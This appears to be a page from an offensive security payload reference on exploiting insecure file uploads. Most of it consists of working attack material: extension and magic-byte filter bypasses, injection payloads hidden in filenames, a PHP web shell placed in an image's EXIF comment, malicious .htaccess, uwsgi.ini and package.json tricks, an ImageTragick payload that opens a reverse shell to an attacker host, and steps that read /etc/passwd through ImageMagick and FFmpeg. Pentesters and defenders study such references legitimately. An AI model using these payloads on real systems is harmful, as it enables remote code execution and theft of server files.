Skip to content

Upload Insecure Files

Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Summary

Tools

Methodology

file-upload-mindmap.png

Defaults Extensions

  • PHP Server
    .php
    .php3
    .php4
    .php5
    .php7
    
    # Less known PHP extensions
    .pht
    .phps
    .phar
    .phpt
    .pgif
    .phtml
    .phtm
    .inc
    
  • ASP Server
    .asp
    .aspx
    .config
    .cer and .asa # (IIS <= 7.5)
    shell.aspx;1.jpg # (IIS < 7.0)
    shell.soap
    
  • JSP : .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .actions
  • Perl: .pl, .pm, .cgi, .lib
  • Coldfusion: .cfm, .cfml, .cfc, .dbm
  • Node.js: .js, .json, .node

Upload Tricks

  • Use double extensions : .jpg.php, .png.php5
  • Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): .php.jpg
  • Random uppercase and lowercase : .pHp, .pHP5, .PhAr
  • Null byte (works well against pathinfo())
    • .php%00.gif
    • .php\x00.gif
    • .php%00.png
    • .php\x00.png
    • .php%00.jpg
    • .php\x00.jpg
  • Special characters
    • Multiple dots : file.php...... , in Windows when a file is created with dots at the end those will be removed.
    • Whitespace and new line characters
      • file.php%20
      • file.php%0d%0a.jpg
      • file.php%0a
    • Right to Left Override (RTLO): name.%E2%80%AEphp.jpg will became name.gpj.php.
    • Slash: file.php/, file.php.\, file.j\sp, file.j/sp
    • Multiple special characters: file.jsp/././././.
  • Mime type, change Content-Type : application/x-php or Content-Type : application/octet-stream to Content-Type : image/gif
    • Content-Type : image/gif
    • Content-Type : image/png
    • Content-Type : image/jpeg
    • Content-Type wordlist: SecLists/content-type.txt
    • Set the Content-Type twice: once for unallowed type and once for allowed.
  • Magic Bytes
    • Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
      • PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
      • JPG: \xff\xd8\xff
      • GIF: GIF87a OR GIF8;
    • Shell can also be added in the metadata
  • Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.")

Filename Vulnerabilities

Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename.

  • Time-Based SQLi Payloads: e.g. poc.js'(select*from(select(sleep(20)))a)+'.extension
  • LFI/Path Traversal Payloads: e.g. image.png../../../../../../../etc/passwd
  • XSS Payloads e.g. '"><img src=x onerror=alert(document.domain)>.extension
  • File Traversal e.g. ../../../tmp/lol.png
  • Command Injection e.g. ; sleep 10;

Also you upload:

  • HTML/SVG files to trigger an XSS
  • EICAR file to check the presence of an antivirus

Picture Compression

Create valid pictures hosting PHP code. Upload the picture and use a Local File Inclusion to execute the code. The shell can be called with the following command : curl 'http://localhost/test.php?0=system' --data "1='ls'".

  • Picture Metadata, hide the payload inside a comment tag in the metadata.
  • Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating getimagesize() and imagecreatefromgif().
    • JPG: use createBulletproofJPG.py
    • PNG: use createPNGwithPLTE.php
    • GIF: use createGIFwithGlobalColorTable.php

Picture Metadata

Create a custom picture and insert exif tag with exiftool. A list of multiple exif tags can be found at exiv2.org

convert -size 110x110 xc:white payload.jpg
exiftool -Copyright="PayloadsAllTheThings" -Artist="Pentest" -ImageUniqueID="Example" payload.jpg
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg

Configuration Files

If you are trying to upload files to a :

  • PHP server, take a look at the .htaccess trick to execute code.
  • ASP server, take a look at the web.config trick to execute code.
  • uWSGI server, take a look at the uwsgi.ini trick to execute code.

Configuration files examples

Apache: .htaccess

The AddType directive in an .htaccess file is used to specify the MIME (Multipurpose Internet Mail Extensions) type for different file extensions on an Apache HTTP Server. This directive helps the server understand how to handle different types of files and what content type to associate with them when serving them to clients (such as web browsers).

Here is the basic syntax of the AddType directive:

AddType mime-type extension [extension ...]

Exploit AddType directive by uploading an .htaccess file with the following content.

AddType application/x-httpd-php .rce

Then upload any file with .rce extension.

WSGI: uwsgi.ini

uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:

Example of a malicious uwsgi.ini file:

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)

When the configuration file will be parsed (e.g. restart, crash or autoreload) payload will be executed.

Dependency Manager

Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file. - package.json

"scripts": {
    "prepare" : "/bin/touch /tmp/pwned.txt"
}
- composer.json
"scripts": {
    "pre-command-run" : [
    "/bin/touch /tmp/pwned.txt"
    ]
}

CVE - ImageMagick

If the backend is using ImageMagick to resize/convert user images, you can try to exploit well-known vulnerabilities such as ImageTragik.

CVE-2016–3714 - ImageTragik

Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)

  • ImageTragik - example #1

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
    pop graphic-context
    

  • ImageTragik - example #3

    %!PS
    userdict /setpagedevice undef
    save
    legal
    { null restore } stopped { pop } if
    { legal } stopped { pop } if
    restore
    mark /OutputFile (%pipe%id) currentdevice putdeviceprops
    

The vulnerability can be triggered by using the convert command.

convert shellexec.jpeg whatever.gif

CVE-2022-44268

CVE-2022-44268 is an information disclosure vulnerability identified in ImageMagick. An attacker can exploit this by crafting a malicious image file that, when processed by ImageMagick, can disclose information from the local filesystem of the server running the vulnerable version of the software.

  • Generate the payload
    apt-get install pngcrush imagemagick exiftool exiv2 -y
    pngcrush -text a "profile" "/etc/passwd" exploit.png
    
  • Trigger the exploit by uploading the file. The backend might use something like convert pngout.png pngconverted.png
  • Download the converted picture and inspect its content with: identify -verbose pngconverted.png
  • Convert the exfiltrated data: python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'

More payloads in the folder Picture ImageMagick/.

CVE - FFMpeg HLS

FFmpeg is an open source software used for processing audio and video formats. You can use a malicious HLS playlist inside an AVI video to read arbitrary files.

  1. ./gen_xbin_avi.py file://<filename> file_read.avi
  2. Upload file_read.avi to some website that processes videofiles
  3. On server side, done by the videoservice: ffmpeg -i file_read.avi output.mp4
  4. Click "Play" in the videoservice.
  5. If you are lucky, you'll the content of <filename> from the server.

The script creates an AVI that contains an HLS playlist inside GAB2. The playlist generated by this script looks like this:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:1.0
GOD.txt
#EXTINF:1.0
/etc/passwd
#EXT-X-ENDLIST

More payloads in the folder CVE FFmpeg HLS/.

Labs

References